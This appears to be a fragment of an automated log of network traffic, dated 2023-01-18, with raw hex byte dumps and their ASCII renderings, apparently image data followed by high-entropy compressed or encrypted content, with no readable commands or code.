                                  2023-01-18 08:13:41 UTC96INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                  Data Ascii:
                                  2023-01-18 08:13:41 UTC112INData Raw: c8 ce 9e 09 cf fc 4b 1c 93 9f 6e 14 c1 3e ed 54 71 5e 16 16 24 16 da de 3d e1 a9 47 c4 31 da 26 fd 7b d9 1f 44 b1 44 45 4c fc a8 05 cb bf 3c 84 bb 00 77 11 d5 ff bf e2 22 59 d5 25 a1 c9 1f 6d 66 25 db a6 2c 94 3d 8d e3 be 2b 39 b2 c7 46 d5 d1 e3 e4 74 f5 71 78 9b 83 ae 43 6a 09 fa 15 15 47 14 19 f9 35 38 b3 ba 91 65 2e c1 72 15 61 7a 0f b7 fb a2 18 db 76 c0 37 be 23 66 eb c6 2d a1 31 f2 a8 d9 76 36 9b 78 f8 bb 16 8b 40 83 b4 ee 87 8e 48 c0 54 74 79 07 0e 8a 30 5d 77 a5 f4 a5 57 94 88 e9 9e 95 91 bc 1e b9 b9 e2 54 4b 0b 29 9b 5e 3d c4 c7 b0 7a 1d ec de 23 9e 78 a5 a4 15 3d f7 4c 29 7b d2 d8 90 30 45 3d fc 86 82 61 43 24 35 77 e9 31 a9 8b 52 a2 4c c2 ff d3 fe 03 12 53 f0 f8 d3 91 91 03 bf 3f f2 5f 8e 19 59 df 64 1e 3e 44 2c 9a 03 87 64 74 a3 ba 26 74 5c 12
                                  Data Ascii: Kn>Tq^$=G1&{DDEL<w"Y%mf%,=+9FtqxCjG58e.razv7#f-1v6x@HTty0]wWTK)^=z#x=L){0E=aC$5w1RLS?_Yd>D,dt&t\
                                  2023-01-18 08:13:41 UTC128INData Raw: ff 00 9c a6 ff 00 9f aa ff 04 a5 ae ff 88 7e 80 ff 65 99 97 ff 06 ae b8 ff 00 ae bb ff 00 b0 bd ff 00 b2 bf ff 00 b3 c0 ff 00 b2 c0 ff 00 b1 be ff 00 af bc ff 00 ad ba ff 00 ab b8 ff 00 a9 b6 ff 00 a7 b3 ff 00 84 8d ff 00 69 71 ff 00 89 93 ff 00 9f aa ff 00 72 7a ff 00 83 8c ff 00 99 a4 ff 00 48 4d ff 00 83 8c ff 00 41 45 ff 00 20 22 ff 00 44 49 ff 00 7f 87 ff 00 8a 93 ff 00 2e 31 ff 00 79 81 ff 00 3f 43 ff 00 44 49 ff 00 99 a3 ff 00 9f aa ff 00 75 7e ff 00 4a 4f ff 00 a7 b3 ff 00 aa b5 ff 00 ac b8 ff 00 af bb ff 00 b1 be ff 00 b4 c1 ff 00 b7 c4 ff 00 b9 c7 fb 00 bb c9 b3 00 bc ca 53 00 bd cb 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f 00 6a
                                  Data Ascii: ~eiqrzHMAE "DI.1y?CDIu~JOSj
                                  2023-01-18 08:13:41 UTC144INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 84 06 00 7f 86 4c 00 81 89 ad 00 85 8d f6 00 8a 93 ff 00 90 99 ff 00 95 9f ff 00 9a a5 ff 21 a0 b1 ff 0a 22 26 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 01 01 01 ff 1f 1f 1f ff 14 14 14 ff 18 4e 58 ff 31 a1 b6 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 83 00 00 7e 85 18 00 80 87 71 00 83 8b d2 00 87 90 ff 00 8d 96 ff 12 96 a4 ff 1c 5b 67 ff 00 00 00 ff 00 00
                                  Data Ascii: }L!"&NX1|~q[g
                                  2023-01-18 08:13:42 UTC160INData Raw: 86 70 29 b9 f6 97 ed eb 24 06 22 f6 22 4e f4 b9 05 7f e8 b5 dc ab 4c 9d 5e f4 aa 3f 90 6b 85 6f 84 cd b0 9e 8d c4 d0 0d 44 53 77 fb 9c f5 3a ed ea b5 1f 95 3d 8d 55 a6 79 50 5e 82 fc 19 4d c0 0d 3f 50 ea e0 fd f0 ef a0 8a 7e 8f c6 d6 81 17 44 59 d9 69 27 6d dc 82 55 af 69 4e fc fd c6 ec cd 9d 04 36 84 42 a2 58 83 2b 28 04 1c 5b d5 ab 31 f4 2c 3f 91 8b ba 68 bf 8d 31 0a 90 27 b5 50 b0 9f 0a 8b 9a 07 62 07 19 c1 61 05 c7 f0 31 92 d0 2d ce d8 3d 7a 0e dc a7 d9 2b 38 b8 80 88 0c 36 a2 97 0d 97 25 b5 42 82 63 63 a5 c6 db 34 1d d4 65 e3 b7 8f 58 c2 dc 61 ba 7e 06 43 19 5a e0 9d 16 97 f4 9b a6 27 07 c3 99 d2 d6 ae 95 5c 7e 85 19 b4 31 4f a8 8e 6d 69 c5 80 d7 7b 70 49 d3 29 15 b1 ac 41 40 0e fd b8 f7 e2 da 1a a4 c6 64 f8 e3 fe 0c 9c de d2 00 84 82 5a 21 da f0 ea
                                  Data Ascii: p)$""NL^?koDSw:=UyP^M?P~DYi'mUiN6BX+([1,?h1'Pba1-=z+86%Bcc4eXa~CZ'\~1Omi{pI)A@dZ!
                                  2023-01-18 08:13:42 UTC176INData Raw: dc 31 45 9f 19 57 33 3f e5 94 36 b3 81 0f f0 b6 70 54 7f b1 ab 89 96 4f 3c 39 b5 55 01 12 d8 0a da 63 76 99 c3 18 cc 67 8d 4a 48 36 20 21 aa e8 f5 4b 05 ba 87 da 9f 78 7d c2 5d 3c cd 87 c9 9f d3 d8 a2 07 6b 92 1e 81 e0 89 5c 07 ec e3 f7 2c 9c f7 96 97 4b d8 04 a6 ed c8 f2 74 e7 01 e4 4e 69 16 e0 e9 ba 95 f9 35 08 82 5f d6 32 70 e2 6e cc ef 98 22 14 21 55 b2 5c c5 86 fb b8 ca 15 dc 99 ff db e1 a8 20 ce e7 80 85 56 ce 3c f2 ac d9 f8 75 40 1e 8e 0f 0e 70 35 27 64 c9 91 c3 b1 b1 9c 5a eb 4e 0f 93 49 63 11 f7 62 3d 43 9a c9 e6 5a d0 59 75 da 5e b4 5b fc cd 07 45 95 8d f1 c1 45 97 5f b6 9b 63 11 0e f4 40 ac 63 3d e9 5c dd 4e 7b 8a 1c 78 e4 80 39 15 c9 be 13 7d 14 9a c0 dc b3 ff 61 2d e0 3a e9 06 ff f9 4c 95 36 1c d4 f2 33 53 45 02 f4 21 82 13 8c af 74 40 98 de
                                  Data Ascii: 1EW3?6pTO<9UcvgJH6 !Kx}]<k\,KtNi5_2pn"!U\ V<u@p5'dZNIcb=CZYu^[EE_c@c=\N{x9}a-:L63SE!t@
                                  2023-01-18 08:13:42 UTC192INData Raw: e4 57 41 b4 e0 c1 a3 77 62 db 73 8a 5c ac d3 d5 b5 02 bf bc e2 43 1d d1 85 4a fa ff 29 c2 ba 89 fa 10 f1 a6 e3 67 08 85 66 e9 b0 45 ae 76 83 ed 6d cd 92 da 61 33 0a 69 5f e3 00 67 b5 d4 e8 87 fa 40 b0 d6 02 a0 55 17 27 a1 67 dc 5f 84 fd b8 12 c5 c8 b9 8a 4e 3c a6 35 02 2d 53 cb 7b e5 8a d4 3b 39 1a 14 f5 93 75 db 9a 06 18 43 df f5 c9 70 36 eb 32 5b 72 53 a5 72 76 8d 3e f6 6c 5f 27 76 5c 05 85 11 4d 20 22 e3 2d 45 ea 71 d8 5c 07 44 9e 61 a6 88 b3 8e 14 1a d9 52 20 52 e6 fc 5b fe 87 ed 89 34 ef 5a 96 bc 7e 5a ce 05 30 db 13 85 7c ef d9 1f 45 7a 9c 73 02 7e 09 65 0a b4 77 5c 54 9e 83 41 31 19 5d f0 44 61 e7 39 22 41 bb c8 c7 a0 62 07 a4 4e 25 24 80 a0 81 11 2d 65 03 d9 05 cb b4 da 85 e6 80 33 2e 0a 1e 3a a7 75 e4 65 74 90 93 ce ea 7e a2 14 a9 a8 c3 60 a7 aa
                                  Data Ascii: WAwbs\CJ)gfEvma3i_g@U'g_N<5-S{;9uCp62[rSrv>l_'v\M "-Eq\DaR R[4Z~Z0|Ezs~ew\TA1]Da9"AbN%$-e3.:uet~`
                                  2023-01-18 08:13:42 UTC208INData Raw: f1 93 d5 6f 9f f9 96 72 3b bf b1 7b de fc 07 d9 64 a8 a9 91 5d 76 4b e9 7d f5 1d 6a 2f 12 2f 50 60 82 f7 45 21 59 26 3d ca f2 d0 f6 40 d2 0e 25 39 47 08 f1 35 98 9b 9f 25 5e 20 75 a6 e8 06 c6 73 ea df 97 2a 37 5b 47 8c b3 4a 7f 4c db 5d 97 d7 a5 e6 60 ae 7a a9 1a e2 32 bd e3 88 ed 9d fb 3f 77 74 5a f8 31 5f a3 03 94 18 ec a5 fb 4e 87 cd a5 db 44 86 de 09 24 e4 0e d3 6f 65 ad fb 73 fb 87 e6 b1 f4 81 e6 67 fc 1f c0 8f 6a f8 29 0f 0e 93 58 24 70 5e a4 95 56 e9 19 c8 ef 48 d5 e1 a5 92 ab b2 91 f7 4e 35 34 12 65 e8 9b 65 cc c4 b0 a8 19 29 7e e1 3c 24 43 6a ed 21 47 d0 02 94 1c 5f 29 83 fd 11 f4 1a 9e 6c 6b a1 12 17 14 89 3b 14 da f9 5b 26 fe b8 9a 19 a1 44 41 a3 4e ef ac 6d 48 06 a0 c3 93 12 12 1d 76 9f 9b 79 fc f4 ef ac d2 bc 3e 8e c7 8f 0a 59 c6 77 03 ca 40
                                  Data Ascii: or;{d]vK}j//P`E!Y&=@%9G5%^ us*7[GJL]`z2?wtZ1_ND$oesgj)X$p^VHN54ee)~<$Cj!G_)lk;[&DANmHvy>Yw@
                                  2023-01-18 08:13:42 UTC224INData Raw: 21 13 bf 4c 91 49 8f 19 b8 14 bc ea 7f 63 5e de 00 7b 86 f0 81 41 24 ad 77 7f 8d 26 20 a9 07 be 73 1a 16 fa 6f 1a c7 22 d4 70 4e 6a 2a e7 38 ec 12 03 9c 7a 9e 82 48 9e 16 35 9e ff 39 7d a6 53 76 c9 60 b6 be 33 42 a0 fa 39 92 b3 3b 8e b5 ac 7f b9 a9 07 f1 7e 93 29 60 37 e5 a9 01 1d a5 24 2a 25 9c 8c fb 6d a4 58 61 6c a1 af 30 43 54 4e 2d 80 98 23 1b 35 f3 3d 55 a0 7b ab 58 76 e5 a6 21 25 78 12 22 5b f7 e6 93 94 3f 47 ed d2 d2 a5 f5 b7 99 3b 33 73 49 6c 19 61 3e d7 11 66 91 5e 41 e1 46 c3 ed d0 d0 53 5b f3 15 c6 d3 37 1b 51 57 bb 11 2b 20 9c 93 d5 38 a8 b6 f4 33 4d c1 16 6b 1a e4 84 d2 cf 00 d9 5f e1 40 e5 2c 5b 84 bf c4 d0 f0 18 a4 25 64 69 0d 25 95 61 e1 44 09 1f 4b 53 7c e1 ce 98 5f d8 49 35 01 93 2e f3 39 59 81 28 5e aa 31 d4 3d 55 f0 4d 39 08 d6 29 3a
                                  Data Ascii: !LIc^{A$w& so"pNj*8zH59}Sv`3B9;~)`7$*%mXal0CTN-#5=U{Xv!%x"[?G;3sIla>f^AFS[7QW+ 83Mk_@,[%di%aDKS|_I5.9Y(^1=UM9):
                                  2023-01-18 08:13:43 UTC240INData Raw: 86 f3 f4 e1 2d a6 fb 36 fa 3d 78 93 4c 13 5c 9a b9 b9 7b 1d ee c3 7e 87 2a dd 1e 21 d0 41 c5 e6 26 35 47 1b d4 07 42 c4 05 29 73 f8 e2 cf 75 d3 d0 82 49 94 aa 69 0c f0 a8 30 6a ba f5 64 57 6f 21 8b 5a 2f 27 dd c9 13 16 a0 5d 0e 04 77 34 ce e3 f5 ea 93 81 ba f3 86 a1 35 16 5e 97 0e 39 8b bd ad f4 d4 6c e0 64 d4 3e 57 50 eb d3 3a 7b 3d 2e 19 ec dd b5 46 71 4b fe ea b8 78 41 18 f5 e2 fd e2 7b 8b bb 9e bd 71 dc 97 ab 07 8e 00 03 98 3f dc 8f e7 5c 83 94 c1 99 03 f6 70 55 3f 4a 8a 60 14 3e 25 79 39 39 48 57 d6 1c 8c 89 f5 2e 57 be 12 16 77 db 5a 0b 2f 6e ac 45 5e 1b 20 b0 61 b5 5a d9 3e 09 fc 58 c2 2f 6b 8d b4 2b cc c5 96 1b ea f9 88 0f b2 0c 68 42 3f 4f 80 4e 27 5a ef 93 68 6a e0 5a 6a 84 9a fb d3 3c ff 41 41 12 06 95 89 18 0f fb 69 f7 e6 c2 f3 53 92 0f 02 c1
                                  Data Ascii: -6=xL\{~*!A&5GB)suIi0jdWo!Z/']w45^9ld>WP:{=.FqKxA{q?\pU?J`>%y99HW.WwZ/nE^ aZ>X/k+hB?ON'ZhjZj<AAiS
                                  2023-01-18 08:13:43 UTC256INData Raw: d5 3f c3 4b f1 8c 65 0e 0a 81 65 76 6e 45 19 65 9b ca 7b bd 8a 4d 6c 3c 11 22 17 0c 4b 28 77 54 c3 4f 73 b7 ce fb 10 47 17 04 83 cf 6a 91 a0 f3 54 7d d8 d1 6c de bd a3 32 1a 54 fc db 79 24 ea 5c 0a 74 93 bf 01 a7 a3 45 8f e8 05 a9 f8 10 21 47 69 e8 b9 e4 1b 00 b5 62 60 95 e4 85 25 d4 1c a2 cc e8 51 43 93 27 81 3f f4 62 2e 38 4f 57 6a a1 1a 52 e6 be 13 f2 1b f3 0d c4 4f 26 5f b7 2e d9 aa 5d 59 04 d6 72 b6 ae cc 59 89 b6 c8 27 cd d2 98 57 8d 90 ee e8 fa b1 34 60 ac c6 36 f4 1e c9 33 e0 6f ad 63 08 33 79 71 0e 30 8a 6c be b1 e0 4f 7d c0 43 78 d5 a5 69 82 f9 8f 27 f8 1c aa d7 96 f5 a9 72 e1 28 b8 c8 07 59 d7 f3 49 4d df 39 a5 a2 29 92 c0 c3 be bc 9f 23 87 b0 11 77 8f 17 29 c2 81 95 a8 11 b4 9d 77 65 bc 93 e5 46 ef 56 39 f4 e8 5a 13 32 2a ec e7 79 4d 9d e1 d5
                                  Data Ascii: ?KeevnEe{Ml<"K(wTOsGjT}l2Ty$\tE!Gib`%QC'?b.8OWjRO&_.]YrY'W4`63oc3yq0lO}Cxi'r(YIM9)#w)weFV9Z2*yM
                                  2023-01-18 08:13:43 UTC272INData Raw: fc 04 8d 55 c9 d1 87 4e f2 7d ec 63 aa 38 03 f2 df 44 28 9f 1c c7 83 ee 0e 5a 38 65 29 fd f2 68 69 fd f0 7d ae 12 82 25 e4 84 2c d0 e9 46 3b 03 f7 c8 dd d5 47 eb 91 34 14 cb 57 0d 59 33 e5 0b 52 9f 25 cf ce 09 2d 43 de db b8 f6 df 49 ce c9 cc c1 3f a3 86 15 2c be 84 3f 80 04 9a 99 0c 24 82 b8 96 81 7a 71 ad 32 d1 78 ca 2c cd d8 7b f5 58 b3 82 6b 4a cc ee 00 01 32 09 cf 44 7d 84 95 36 dd 34 45 f4 53 c3 3d 9a 7c 5b 28 6c 6c 84 ff 31 39 db ca 87 55 a2 57 50 90 a5 fd 3b 5f a1 d7 ac c6 bc 08 aa 4c 07 c3 08 7d b2 a4 59 e4 bb c6 2e 7e db ee 0c 0f 20 69 1c 86 08 dc 5a 1d bf e5 ab b5 71 4e 1c 24 b1 5c 0f cc 20 4f 70 ac 21 7a bf df e6 f7 ac 5d 17 1f 87 1b 7e ef 66 d3 86 0a d2 3d ee 60 4c 77 50 42 12 d7 e9 fd 78 ff 32 fc 21 cd cc 05 a9 c4 02 fb c3 41 9e a8 2a 95 ef
                                  Data Ascii: UN}c8D(Z8e)hi}%,F;G4WY3R%-CI?,?$zq2x,{XkJ2D}64ES=|[(ll19UWP;_L}Y.~ iZqN$\ Op!z]~f=`LwPBx2!A*
                                  2023-01-18 08:13:43 UTC288INData Raw: ad f2 0a f0 d2 67 dd 56 34 29 f4 ce 02 24 ac 5c 72 b5 14 13 6a 00 6a c1 04 68 ce a5 84 dc d5 2c 23 f3 92 de c7 91 93 16 0e 7f b6 f7 e9 17 6e 03 f6 33 17 ba 44 f6 98 2c 5d 4a 67 3e d1 e9 5b 85 79 4d 7c 96 76 9a 65 c7 b5 2a 3a e0 95 50 39 09 98 a4 fe 6a 55 dd 54 0c b8 3a c3 56 8a 89 5a 4d 99 88 e7 90 87 2d c6 93 13 b2 64 cc ec fb a6 fe 74 d7 00 aa 4e b5 64 a8 66 e5 64 0a 7e a6 6c cf 90 a0 20 4f 87 1c 66 28 85 d1 bd f1 96 fd 40 d0 59 ae f3 b0 32 88 db 53 d2 c0 e3 0c e1 e4 61 82 b6 a1 ea 2b 9c d6 d8 26 90 07 9c 19 dc 62 65 67 7a d8 0f 9b c0 94 e3 0d 40 fe 7d d8 43 72 0c 21 c2 fe 6f a8 6f 8b 6c 9f eb fc 99 99 81 44 3d 05 fc d4 2a 92 e2 7c a6 a4 95 86 ef 13 c7 92 69 97 83 1e d3 b2 18 fb 34 9d 0c 74 6d 2d 67 cf 30 ae 56 fe d8 f4 ab 48 53 4d 5f d3 4a a3 48 e9 10
                                  Data Ascii: gV4)$\rjjh,#n3D,]Jg>[yM|ve*:P9jUT:VZM-dtNdfd~l Of(@Y2Sa+&begz@}Cr!oolD=*|i4tm-g0VHSM_JH
                                  2023-01-18 08:13:44 UTC304INData Raw: ad d0 3f 7f 45 c5 8a 0e 58 a6 61 f6 8e 44 49 a5 66 00 94 52 c8 a0 4e b7 92 12 ab 69 52 84 d5 1f a4 2b c3 18 4d 14 48 b7 6d ef 08 45 12 8b a9 a8 7f 32 d6 88 ce 91 70 7e 85 92 a7 12 60 bc 20 79 63 97 72 2d ea 5d 71 b3 52 b3 3f 4d bf 86 70 55 55 b5 b1 f9 b1 d9 ef fc fc 53 97 19 a4 e0 b2 33 7b 87 23 f9 b7 33 d1 2b 8b d1 bd 6d 24 59 ec 5f 54 d8 af eb 6a 64 19 10 bd 54 ac bc 1c df e7 d1 9f 33 02 bc 4e d3 d6 25 55 bd bc e0 bb b6 4c b8 cd e0 50 e1 5c 82 98 c0 0a 96 03 93 15 2a 6c 14 8b 5b 84 b4 61 86 12 e6 de 8f 6c ed e4 da bd a6 a0 61 df e8 32 29 c5 87 7c ce 49 52 d7 51 2b 64 fe 81 6b 03 2d e0 3d ad 50 5f eb 44 78 68 b1 ce c5 71 f5 85 8e c0 36 03 d3 9c d0 65 d5 a5 df 50 bf 01 95 67 9d 87 c5 82 40 19 42 9f 78 78 6f 1d 0f 27 6c c0 82 ab 4c f0 fd 05 97 31 2b 0c fa
                                  Data Ascii: ?EXaDIfRNiR+MHmE2p~` ycr-]qR?MpUUS3{#3+m$Y_TjdT3N%ULP\*l[ala2)|IRQ+dk-=P_Dxhq6ePg@Bxxo'lL1+
                                  2023-01-18 08:13:44 UTC320INData Raw: e8 c2 c9 17 e4 f1 8c 46 14 2a 66 2d 07 0f 7e 8a f3 38 cd 76 cb da 4b ce 71 92 f8 52 22 a1 a3 f3 82 2d 4c ea f9 23 06 8f 34 51 ea 19 ae 10 6a e9 84 61 1e 25 eb 78 aa 06 03 22 e6 cd 21 c8 73 4d 24 19 02 63 a4 4b 0e 3b f6 28 a4 38 6f 83 46 c7 5e 2a e4 54 7c 68 af 36 fb 65 20 5c 88 d5 2d 02 d0 c3 6d ec de c6 f4 d0 e6 80 c0 74 f8 c1 1d bf d2 2c 5e 36 6e b1 22 bd aa 9e 4c 86 6e 9f 0c e3 62 b8 7d d2 00 f7 66 f6 87 5c ef c0 c3 d5 5a bb db 10 13 de 6d c0 15 cc bc cf ad 05 2f 48 03 e3 d4 ca 3c 8f 09 c5 b2 52 26 26 7d 6d d4 85 95 ce d9 80 dc 56 e5 cb 26 c0 24 70 ca 9e 9a d3 da 75 81 59 b2 5b 64 46 1f 6e a4 aa f3 a8 03 c3 dc 4e f4 77 98 16 b7 7a f8 f3 36 01 17 51 f1 75 df 23 db 6b fd bf 9e 97 52 86 44 f0 9e e0 34 17 c4 0b b2 42 75 7a a3 99 7c 63 39 d1 8f e5 40 63 7c
                                  Data Ascii: F*f-~8vKqR"-L#4Qja%x"!sM$cK;(8oF^*T|h6e \-mt,^6n"Lnb}f\Zm/H<R&&}mV&$puY[dFnNwz6Qu#kRD4Buz|c9@c|
                                  2023-01-18 08:13:44 UTC336INData Raw: 54 19 23 e6 c7 79 2c a5 43 e5 cb ca db a0 fb 72 9f 95 1e 55 88 6e cf 15 59 03 99 27 11 2a c0 38 0c b9 e4 82 81 13 ac 12 0d b3 60 b2 17 83 f0 ff 01 51 f3 9f a5 13 8b aa 94 2d 91 97 3c 1a 54 be 02 25 85 dc 0f b4 1a f5 48 8f a0 83 e0 0d a7 bb 4d 2f a0 95 c7 c6 9f 7e 17 2c e5 06 d7 75 f4 85 37 7b 81 2f c4 3e a6 ee 9d 69 89 ec 9c b3 ce 7a f4 ba 5d 59 ce d5 6d 53 25 63 8f 8c 17 fa bf 1a 7f aa 7d 5f 88 ea 17 e0 10 a7 46 eb 91 32 37 e8 06 3f 71 ed 26 cb 5c e8 ea 8f 6a 8f 1f 54 e0 05 fc dd ee 77 60 8d f8 95 3e 71 d7 b9 54 34 5f 79 45 25 7b bf d1 e2 72 a6 d1 f7 ed 8e f3 68 bf 69 c6 77 ab 53 c4 dd 86 89 c4 2b dc ef 59 be f5 36 03 4f 98 73 a5 1f 11 a8 03 6e d3 b0 2f 2d 18 44 c0 99 e7 e4 21 60 ae 9c d2 e3 8f 75 70 3e 23 1a 5a 4b 37 fd 88 cd f9 d4 10 e3 bc d4 c0 3b ce
                                  Data Ascii: T#y,CrUnY'*8`Q-<T%HM/~,u7{/>iz]YmS%c}_F27?q&\jTw`>qT4_yE%{rhiwS+Y6Osn/-D!`up>#ZK7;
                                  2023-01-18 08:13:44 UTC352INData Raw: 47 05 b0 78 2a 3e b9 79 6c c9 48 07 75 11 7e b5 ea bb 29 3e 93 5e a8 d8 75 5f 64 89 62 d9 59 85 ad eb 31 43 d9 a7 c4 d2 8e 92 ad 8e d5 f4 8b dc bd 36 52 b8 7c 69 10 da b5 90 60 0b 06 76 0a c1 be 26 af 8d 42 18 d4 bb 7f fd 76 f9 fd 49 2b 89 c3 99 6d 96 96 6b e7 9d d3 03 c2 2f a8 9a f6 47 e3 92 23 c1 f4 c8 11 ab df d2 b2 0f 4c 22 b8 cb 37 13 e0 30 d9 0d d8 ea 0f f6 20 4e 80 23 a9 9f 36 fe a5 89 3f 6c c6 bb 64 06 df 44 78 78 4d 9e 9c 6b 79 7a 34 f3 ee de e7 a8 f8 f0 cc 64 ac 53 a2 95 46 93 6e 21 0a db 38 6c 31 fa da d2 4d 39 08 20 fe 7f 64 e7 df e4 67 7e a2 6b ab 7a 75 7a 9d fc 4d 2d c0 74 88 87 f4 5e 23 d0 9d 82 a3 af f7 c8 e3 cf 64 f9 29 93 65 e0 db 96 be 2a 09 6b 53 1e 60 01 b1 98 fa 2b f0 1a 34 33 73 d5 7a b9 4f 5f 4c 66 11 27 d4 05 5b 37 b4 49 ea 33 07
                                  Data Ascii: Gx*>ylHu~)>^u_dbY1C6R|i`v&BvI+mk/G#L"70 N#6?ldDxxMkyz4dSFn!8l1M9 dg~kzuzM-t^#d)e*kS`+43szO_Lf'[7I3
                                  2023-01-18 08:13:44 UTC368INData Raw: 0f 23 de 65 9f 06 04 ea 75 a9 47 66 c2 0e 54 5d 81 a6 ff 62 98 ac a3 43 f0 87 eb fb 44 63 4e b1 07 db d6 a8 86 6c 32 3e 5d b7 bb 89 64 cd 55 3e c0 99 fb f5 92 6d 41 0d d7 6e 4f 3a 99 ba ce c5 00 f9 20 5f da 77 e1 c2 cc 09 9a 0d 02 05 b6 14 13 0f db 81 7f 3a 56 ef 5b c9 a7 50 2c 9d 29 d9 3a 29 f6 6f 03 ea 21 a7 ab 8f d7 92 9d 61 59 67 5f 68 ba 70 0f 43 9c 2b fa 1e 9d 13 72 9a 65 ce c0 d8 78 83 11 cb 02 a7 3c 98 86 8e ee a5 48 dc 4a 3e c0 cc 32 f4 db 1d ac 36 21 c8 0e 4a 08 49 c8 92 3f 57 83 9e 4d 82 1d ff 7a 7b f2 a6 fc 66 c0 35 f9 70 b3 c4 04 9b 1f 63 70 ed 1c b5 99 76 27 23 1f 24 b6 3b 94 91 7b 53 4f 4e 11 85 40 cd 81 93 5d 84 b1 13 4a 09 9c 6d 15 85 32 7b e7 3a 1f 12 2f 7b 06 86 f1 ac 27 73 a7 21 b8 6e 36 09 93 82 06 ce 1d 0e 19 b8 6f 82 47 13 e0 18 42
                                  Data Ascii: #euGfT]bCDcNl2>]dU>mAnO: _w:V[P,):)o!aYg_hpC+rex<HJ>26!JI?WMz{f5pcpv'#$;{SON@]Jm2{:/{'s!n6oGB
                                  2023-01-18 08:13:45 UTC384INData Raw: 42 bd b0 96 c0 6a 0c 20 65 fb b2 15 3f 21 a3 31 2c 49 35 73 fb 7e 52 cd 4f f1 c1 96 ea 4d 8b 98 37 c7 63 c6 ae 30 cf 62 95 3c 12 b6 5c ea c2 72 b1 6d 35 77 b9 5c be 2b 29 b4 65 44 d4 1d bd 31 70 f7 a9 e1 8b e2 51 9b 77 ab c1 58 fe e8 0e bf 0e 3d aa d7 35 45 64 b8 b6 fe 01 70 12 ec c2 6b cb 2a 89 9b 8d b2 34 2e ae af e8 74 34 0d c7 bc b7 fc 8b 38 b9 6a ea de 17 3a 71 75 39 93 7a 9e 17 04 ba 93 1e 87 f5 22 38 38 93 dd ce 3f f8 0a 82 80 ea ce 66 53 bd 48 74 a8 19 8b d2 bc 23 cc 65 9f c8 14 e9 ea 70 5f f4 c8 ca 40 a9 fb ed b0 c4 d1 de 99 2c 25 ed 96 cb f4 21 f8 0d ce 8a 88 9f 89 4b 6d e9 f9 75 30 c0 07 c5 32 f3 24 2b 00 ea 2d 14 6f dc 63 b0 fa 40 ad 65 52 d5 d1 26 79 af 5e 67 b3 96 b6 97 32 06 71 51 ef 51 3f 34 d6 86 34 fd 7e 8f 4d a9 51 e7 3e a6 6a 2d b9 bb
                                  Data Ascii: Bj e?!1,I5s~ROM7c0b<\rm5w\+)eD1pQwX=5Edpk*4.t48j:qu9z"88?fSHt#ep_@,%!Kmu02$+-oc@eR&y^g2qQQ?44~MQ>j-
                                  2023-01-18 08:13:45 UTC400INData Raw: 17 a0 c9 46 11 1f ac 67 27 74 8a a8 bf ed a0 93 7a c5 17 ac 9c 86 d1 ce b4 13 91 dc bc df e6 1c 12 cb 0b 7c 43 7b 49 e7 bd 17 19 07 e6 ce d7 b7 de a5 14 85 08 4f 2b ac d8 2e 19 75 f7 ed bb a8 27 5c 29 37 50 db 1c a6 05 78 4e f8 94 e1 cf 8e 7d c9 f9 ee 63 61 91 a6 6b 42 4d d0 03 3a a2 c4 ba a4 3e de 5e c3 b6 8e 82 54 8c c3 a8 c6 72 40 0f e3 bc 0b 80 ea d0 f7 7f 41 fc e1 da b8 6a ea b7 c3 f2 5d 40 79 47 59 8c 2e 43 8a 5c db d8 1a ac c8 12 9a d1 cf ca 68 b2 24 99 a8 2e d6 1c 1b ac ff 1d a2 6a be 54 08 ba 47 19 6e 1f 89 2d af de bd 58 e6 81 dd 58 25 18 41 cc 87 4c 75 37 03 66 16 da 01 7f f7 b8 0d 2c 2b 4e c8 bf e7 39 90 29 c0 13 cf a0 ea 2c 0b 17 c0 0c a3 c3 53 d6 7e 6d 9d 79 da d3 ab 15 b9 b9 9f af 0e 6f 89 8a a1 6b 82 17 c2 18 21 ee 9c 1d cc e7 04 d5 3a 56
                                  Data Ascii: Fg'tz|C{IO+.u'\)7PxN}cakBM:>^Tr@Aj]@yGY.C\h$.jTGn-XX%ALu7f,+N9),S~myok!:V
